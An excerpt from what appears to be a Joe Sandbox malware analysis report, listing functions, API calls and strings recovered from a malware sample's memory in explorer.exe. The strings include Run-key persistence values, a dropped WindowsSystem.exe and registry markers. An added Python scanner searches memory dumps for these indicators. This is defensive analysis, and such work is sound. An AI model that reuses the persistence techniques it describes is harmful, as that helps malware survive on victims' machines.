                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseDeleteOpenValue
                                                                                                            • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Run$Software\Microsoft\Windows\CurrentVersion\Run${AB1F3E47-AEF1-400E-A108-233A046C3A34}
                                                                                                            • API String ID: 849931509-2070010218
                                                                                                            • Opcode ID: 18b7775432b7624f2f27483179afdce4d241ea27d62cc07b0c6b43f001c51a34
                                                                                                            • Instruction ID: 79c55dd891e6d4413b57571926cadc4718e1e349e0a95617100c7c27fbbb7542
                                                                                                            • Opcode Fuzzy Hash: 18b7775432b7624f2f27483179afdce4d241ea27d62cc07b0c6b43f001c51a34
                                                                                                            • Instruction Fuzzy Hash: 50012C76210AC082EA209F11FD543557324FBE47A9F801B26DA9E626F8DF3DC649C710
                                                                                                            APIs
                                                                                                            • SHGetKnownFolderPath.SHELL32 ref: 00E0F587
                                                                                                            • lstrlenW.KERNEL32 ref: 00E0F59A
                                                                                                            • lstrlenW.KERNEL32 ref: 00E0F5B5
                                                                                                            • LocalAlloc.KERNEL32 ref: 00E0F5DC
                                                                                                            • CoTaskMemFree.COMBASE ref: 00E0F647
                                                                                                              • Part of subcall function 00E28378: _errno.LIBCMT ref: 00E283AF
                                                                                                              • Part of subcall function 00E28378: _invalid_parameter_noinfo.LIBCMT ref: 00E283BA
                                                                                                            • lstrlenW.KERNEL32 ref: 00E0F620
                                                                                                            • CoTaskMemFree.COMBASE ref: 00E0F635
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$FreeTask$AllocFolderKnownLocalPath_errno_invalid_parameter_noinfo
                                                                                                            • String ID: %s\%s\
                                                                                                            • API String ID: 2748012262-2168696002
                                                                                                            • Opcode ID: 3cca972c16843a3f2efd62632e49bbe6d0520c0f8e1cd0dcd88a84282803a08c
                                                                                                            • Instruction ID: a357c05f0ef9d8e94ff518ae0fbd8aa22afb51293a05364cc6489e10a2aeb621
                                                                                                            • Opcode Fuzzy Hash: 3cca972c16843a3f2efd62632e49bbe6d0520c0f8e1cd0dcd88a84282803a08c
                                                                                                            • Instruction Fuzzy Hash: 38312B32208A8486DB54DB25F95436AB7B1F7C9B84F504421EB8E93B68DF7DC999CB00
                                                                                                            APIs
                                                                                                              • Part of subcall function 00E0F510: SHGetKnownFolderPath.SHELL32 ref: 00E0F587
                                                                                                              • Part of subcall function 00E0F510: lstrlenW.KERNEL32 ref: 00E0F59A
                                                                                                              • Part of subcall function 00E0F510: lstrlenW.KERNEL32 ref: 00E0F5B5
                                                                                                              • Part of subcall function 00E0F510: LocalAlloc.KERNEL32 ref: 00E0F5DC
                                                                                                              • Part of subcall function 00E0F510: lstrlenW.KERNEL32 ref: 00E0F620
                                                                                                              • Part of subcall function 00E0F510: CoTaskMemFree.COMBASE ref: 00E0F635
                                                                                                            • GetFileAttributesW.KERNEL32 ref: 00E0FB60
                                                                                                              • Part of subcall function 00E28378: _errno.LIBCMT ref: 00E283AF
                                                                                                              • Part of subcall function 00E28378: _invalid_parameter_noinfo.LIBCMT ref: 00E283BA
                                                                                                            • DeleteFileW.KERNEL32 ref: 00E0FB1A
                                                                                                            • RemoveDirectoryW.KERNEL32 ref: 00E0FB2D
                                                                                                            • LocalFree.KERNEL32 ref: 00E0FB40
                                                                                                            • LocalFree.KERNEL32 ref: 00E0FB55
                                                                                                            • GetFileAttributesW.KERNEL32 ref: 00E0FB77
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileFreeLocallstrlen$Attributes$AllocDeleteDirectoryFolderKnownPathRemoveTask_errno_invalid_parameter_noinfo
                                                                                                            • String ID: %s%s$WindowsSystem.exe
                                                                                                            • API String ID: 2317434139-4151400913
                                                                                                            • Opcode ID: 1416f4c1b8bfc263e6edc9f5aa8eccf88895dd98b75af6870fdf466bacd7e51a
                                                                                                            • Instruction ID: 27fd846804d3f5deef8a22a70aed1196e3901088cf646ec8e603bbde82bdd442
                                                                                                            • Opcode Fuzzy Hash: 1416f4c1b8bfc263e6edc9f5aa8eccf88895dd98b75af6870fdf466bacd7e51a
                                                                                                            • Instruction Fuzzy Hash: 9D2141212249C491D770DB24F99839A73A0F7D4B55F901A32D69E93AF4EF3DC599CB00
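The three function blocks above each expose a string a responder can pivot on: the routine that compares the module path against %s\cmd.exe, %s\explorer.exe and %s\svchost.exe (which host process the code is running in), the registry routine keyed on the value name {AB1F3E47-AEF1-400E-A108-233A046C3A34} under ...\CurrentVersion\Run, and the routine that resolves a known folder and removes WindowsSystem.exe. The scanner below is an added example, not part of the Joe Sandbox report and not code from the sample: it searches a raw memory dump (such as the .sdmp files listed for this function) for those strings as UTF-16LE, since the routines call the wide-character APIs (GetModuleFileNameW, StrCmpIW, lstrlenW, DeleteFileW), and also as ASCII, and reports offsets relative to the dump's base. The category names and the persistence_confirmed heuristic are my own choices, and the input built by build_sample_dump is constructed for illustration, not bytes taken from this analysis.

```python
# Added example (not from the Joe Sandbox report or the analysed sample):
# pivot on the indicator strings surfaced in the function analysis above.
from __future__ import annotations

from dataclasses import dataclass

# Strings copied from the "String ID" fields of the function blocks above,
# grouped by the behaviour each routine implements (category names are mine).
INDICATORS: dict[str, list[str]] = {
    "host-process check": [r"%s\cmd.exe", r"%s\explorer.exe", r"%s\svchost.exe"],
    "run-key persistence": [
        r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
        r"Software\Microsoft\Windows\CurrentVersion\Run",
        "{AB1F3E47-AEF1-400E-A108-233A046C3A34}",
    ],
    "dropped artifact": ["WindowsSystem.exe"],
    "window class": ["{9C8B46D6-3D59-421D-A2D1-8F95C9197AC8}"],
}


@dataclass(frozen=True)
class Hit:
    category: str
    indicator: str
    offset: int      # file offset, or virtual address when `base` is given
    encoding: str    # "utf-16le" or "ascii"


def scan_dump(data: bytes, base: int = 0) -> list[Hit]:
    """Find every occurrence of every indicator, in both encodings.

    The routines above use the W (wide) APIs, so their string constants are
    expected as UTF-16LE; ASCII copies are searched too in case a narrow
    format argument was built. `base` is added to each offset so results can
    be read as virtual addresses (the dump above reports Offset: 00E00000).
    """
    hits: list[Hit] = []
    for category, strings in INDICATORS.items():
        for s in strings:
            needles = (("utf-16le", s.encode("utf-16-le")), ("ascii", s.encode("ascii")))
            for enc_name, needle in needles:
                start = 0
                while True:
                    idx = data.find(needle, start)
                    if idx < 0:
                        break
                    hits.append(Hit(category, s, base + idx, enc_name))
                    start = idx + 1
    return sorted(hits, key=lambda h: h.offset)


def summarize(hits: list[Hit]) -> dict[str, int]:
    """Count hits per category, for a quick triage verdict."""
    counts: dict[str, int] = {}
    for h in hits:
        counts[h.category] = counts.get(h.category, 0) + 1
    return counts


def persistence_confirmed(hits: list[Hit]) -> bool:
    """Heuristic (mine): both a Run key path and the GUID value name were seen.

    The registry routine above (API ID CloseDeleteOpenValue) opens a Run key
    and operates on a value named by that GUID, so seeing both together is a
    stronger signal than either string alone.
    """
    seen = {h.indicator for h in hits if h.category == "run-key persistence"}
    has_key = any(s.lower().endswith(r"currentversion\run") for s in seen)
    return has_key and "{AB1F3E47-AEF1-400E-A108-233A046C3A34}" in seen


def build_sample_dump() -> bytes:
    """Constructed test input, NOT a real memory dump: a few indicator strings
    embedded in zero padding, UTF-16LE as the W-APIs would keep them, plus one
    ASCII copy of the dropped file name."""
    pad = b"\x00" * 64
    parts = [
        pad,
        r"%s\explorer.exe".encode("utf-16-le"), b"\x00\x00", pad,
        r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run".encode("utf-16-le"), b"\x00\x00",
        "{AB1F3E47-AEF1-400E-A108-233A046C3A34}".encode("utf-16-le"), b"\x00\x00", pad,
        "WindowsSystem.exe".encode("utf-16-le"), b"\x00\x00",
        b"WindowsSystem.exe\x00",
        pad,
    ]
    return b"".join(parts)


if __name__ == "__main__":
    # Replace build_sample_dump() with open(path, "rb").read() for a real .sdmp.
    found = scan_dump(build_sample_dump(), base=0x00E00000)
    for h in found:
        print(f"{h.offset:08X} {h.encoding:8} {h.category:20} {h.indicator}")
    print("per category:", summarize(found))
    print("run-key persistence confirmed:", persistence_confirmed(found))
```

To use it on the report's own material, download one of the .sdmp files listed under Memory Dump Source, pass its bytes to scan_dump with base set to the Offset value shown for that dump (0x00E00000 here), and compare the reported addresses with the xrefs the plugin printed (for example 00E0F3C5 and 00E0F3DD for the Run key and GUID). A hit on the GUID value name in a live system's Run key, rather than in a dump, is the host-side check to run next.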
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: LocalUninitialize$AllocCreateFreeFromGuidInitializeStringund_memcpywsprintf
                                                                                                            • String ID:
                                                                                                            • API String ID: 3539965953-0
                                                                                                            • Opcode ID: 95a77f028184b52904f9620fb9d0f05d06bea14b2b953f3118e62dd5adf3fbc4
                                                                                                            • Instruction ID: 171dd5f0686b5790e4d7f464f593726a60d7d13c5c92ed22f143929e1c8bfb4c
                                                                                                            • Opcode Fuzzy Hash: 95a77f028184b52904f9620fb9d0f05d06bea14b2b953f3118e62dd5adf3fbc4
                                                                                                            • Instruction Fuzzy Hash: B4215E32328BC482DB74DB25F95439E63A1FBD5B80F405425D98AA7A68CF7DC548CB40
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36, xrefs: 00E04A1A
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeLocalObjectSingleWait
                                                                                                            • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                                                                                            • API String ID: 2302018356-4002695862
                                                                                                            • Opcode ID: bf519136ccd4abf063f206afac4ce43c27d6987f6cd99cde0c11dd423466edb2
                                                                                                            • Instruction ID: c015579a4bdb99481165d56befd727eaaebc0b5f3cfd3fdbd00b25c14e2e662d
                                                                                                            • Opcode Fuzzy Hash: bf519136ccd4abf063f206afac4ce43c27d6987f6cd99cde0c11dd423466edb2
                                                                                                            • Instruction Fuzzy Hash: 53E106B6206BC0C5EB24CF04F5D53AAB3A0F7A4748F50152AD68EA67E4DB7DC185CB80
                                                                                                            APIs
                                                                                                              • Part of subcall function 00E28378: _errno.LIBCMT ref: 00E283AF
                                                                                                              • Part of subcall function 00E28378: _invalid_parameter_noinfo.LIBCMT ref: 00E283BA
                                                                                                            • RegCreateKeyExW.KERNEL32 ref: 00E045F4
                                                                                                            • RegSetValueExW.KERNEL32 ref: 00E0462B
                                                                                                            • RegCloseKey.KERNEL32 ref: 00E0463A
                                                                                                            • RegCloseKey.ADVAPI32 ref: 00E0464C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Close$CreateValue_errno_invalid_parameter_noinfo
                                                                                                            • String ID: ?$SOFTWARE\%s${108D3252-20F0-4C1B-940D-6ED5366D8FD3}
                                                                                                            • API String ID: 3235468379-2864920908
                                                                                                            • Opcode ID: 5711614ded0e062e90a3729fd925f5ac6c8927b05acfcae75dff4fb6692581c7
                                                                                                            • Instruction ID: 540c17e2497e354f265f9ef1b63e561dcba200c941fa8ae5eba89d45002a3dbf
                                                                                                            • Opcode Fuzzy Hash: 5711614ded0e062e90a3729fd925f5ac6c8927b05acfcae75dff4fb6692581c7
                                                                                                            • Instruction Fuzzy Hash: D9216D72218B84C6E750DF25F99875AB3A0F7D4794F401622EA9D93BA8EFBDC544CB00
                                                                                                            APIs
                                                                                                              • Part of subcall function 00E28378: _errno.LIBCMT ref: 00E283AF
                                                                                                              • Part of subcall function 00E28378: _invalid_parameter_noinfo.LIBCMT ref: 00E283BA
                                                                                                            • RegCreateKeyExW.KERNEL32 ref: 00E05340
                                                                                                            • RegSetValueExW.KERNEL32 ref: 00E05374
                                                                                                            • RegCloseKey.ADVAPI32 ref: 00E05383
                                                                                                            • RegCloseKey.ADVAPI32 ref: 00E05395
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Close$CreateValue_errno_invalid_parameter_noinfo
                                                                                                            • String ID: ?$SOFTWARE\%s${DF4EE2DA-C20C-4BBF-97D5-4B94E23FE1C8}
                                                                                                            • API String ID: 3235468379-678327417
                                                                                                            • Opcode ID: ede5476453c4f99a9dd9d77d60b50a0d4b44caa61fb95a6ad4146687fa891cdb
                                                                                                            • Instruction ID: 1acfb0750104d2a66e828b73921d19ba5aeec431ddb42b36975b78b11a8c12e7
                                                                                                            • Opcode Fuzzy Hash: ede5476453c4f99a9dd9d77d60b50a0d4b44caa61fb95a6ad4146687fa891cdb
                                                                                                            • Instruction Fuzzy Hash: 57215E32218B80C2E7109F61F99875BB3A4F7947D4F901A21EA9957BA8DFBDC544CB04
                                                                                                            APIs
                                                                                                            • SHGetKnownFolderPath.SHELL32(?,?,?,?,?,?,?,?,00E167C4), ref: 00E0F7AF
                                                                                                            • LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,00E167C4), ref: 00E0F7C3
                                                                                                            • wnsprintfW.SHLWAPI ref: 00E0F7FC
                                                                                                            • lstrlenW.KERNEL32 ref: 00E0F80B
                                                                                                            • CoTaskMemFree.COMBASE ref: 00E0F81D
                                                                                                            • CoTaskMemFree.COMBASE ref: 00E0F82F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FreeTask$AllocFolderKnownLocalPathlstrlenwnsprintf
                                                                                                            • String ID: %s\%s
                                                                                                            • API String ID: 1665550476-4073750446
                                                                                                            • Opcode ID: 22d0398798acd8f4693eaf530b2968c768c5f25ad5cccc69d563900eb890bec1
                                                                                                            • Instruction ID: 13d3170be54bcd7d8fda81ab0d725b9ee0ffa65ad416130ee09d54c3861d93f8
                                                                                                            • Opcode Fuzzy Hash: 22d0398798acd8f4693eaf530b2968c768c5f25ad5cccc69d563900eb890bec1
                                                                                                            • Instruction Fuzzy Hash: BE114832628AC182E7548F14F94435A63A0FBC4B84F406822FA8A93B68DF7DC556CB00
                                                                                                            APIs
                                                                                                            • LocalAlloc.KERNEL32 ref: 00E0778A
                                                                                                              • Part of subcall function 00E28378: _errno.LIBCMT ref: 00E283AF
                                                                                                              • Part of subcall function 00E28378: _invalid_parameter_noinfo.LIBCMT ref: 00E283BA
                                                                                                            • RegGetValueW.KERNEL32 ref: 00E077FC
                                                                                                            • LocalFree.KERNEL32 ref: 00E07820
                                                                                                            Strings
                                                                                                            • SOFTWARE\%s, xrefs: 00E077A8
                                                                                                            • {BB52E685-57DB-490D-A4DD-CCF2F7D90D58}, xrefs: 00E077A1
                                                                                                            • {C3120582-398C-4F3B-A956-7E9F9DB9EF8E}, xrefs: 00E077E9
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Local$AllocFreeValue_errno_invalid_parameter_noinfo
                                                                                                            • String ID: SOFTWARE\%s${BB52E685-57DB-490D-A4DD-CCF2F7D90D58}${C3120582-398C-4F3B-A956-7E9F9DB9EF8E}
                                                                                                            • API String ID: 3172112264-3858757917
                                                                                                            • Opcode ID: 60108e8e6420cc122c2957bd5de8267001585b959a6d0fefbf3756c8c20c9b2b
                                                                                                            • Instruction ID: 7330cc255ee9e6f0c697f1d3b86bd19c3a0b1f59c2471e07f32221da140cb496
                                                                                                            • Opcode Fuzzy Hash: 60108e8e6420cc122c2957bd5de8267001585b959a6d0fefbf3756c8c20c9b2b
                                                                                                            • Instruction Fuzzy Hash: B4112131618B8082E750CB54F44839A73B0F795794FA04626E7DDA3BA8DF7EC545C740
                                                                                                            APIs
                                                                                                              • Part of subcall function 00E28378: _errno.LIBCMT ref: 00E283AF
                                                                                                              • Part of subcall function 00E28378: _invalid_parameter_noinfo.LIBCMT ref: 00E283BA
                                                                                                            • RegOpenKeyW.ADVAPI32 ref: 00E0474E
                                                                                                            • RegSetValueExW.KERNEL32 ref: 00E04789
                                                                                                            • RegCloseKey.ADVAPI32 ref: 00E04798
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmp
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseOpenValue_errno_invalid_parameter_noinfo
                                                                                                            • String ID: SOFTWARE\%s${108D3252-20F0-4C1B-940D-6ED5366D8FD3}
                                                                                                            • API String ID: 2168760479-2357458413
                                                                                                            • Opcode ID: b277b5005de9c5819c51337204c57e9bf34851ef5143b6271afdb0f866b5614f
                                                                                                            • Instruction ID: 17f616ec3ca36b9fa528544edb0b9da667041fae0cb618f048e541bd2c6e0fa0
                                                                                                            • Opcode Fuzzy Hash: b277b5005de9c5819c51337204c57e9bf34851ef5143b6271afdb0f866b5614f
                                                                                                            • Instruction Fuzzy Hash: D3116DB6324A8192D750DF20F94479A73A0FB94780F501912A68E93BE8DF39C544CB50
                                                                                                            APIs
                                                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00E1E2C7
                                                                                                            • GetSecurityDescriptorSacl.ADVAPI32 ref: 00E1E2E5
                                                                                                            • SetNamedSecurityInfoW.ADVAPI32 ref: 00E1E31E
                                                                                                            • LocalFree.KERNEL32 ref: 00E1E32D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000010.00000002.2933884391.0000000000E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E00000, based on PE: true
                                                                                                            • Associated: 00000010.00000002.2933855119.0000000000E00000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933920370.0000000000E38000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E44000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5C000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E61000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2933939123.0000000000E68000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000010.00000002.2934079006.0000000000E6C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_16_2_e00000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Security$Descriptor$ConvertFreeInfoLocalNamedSaclString
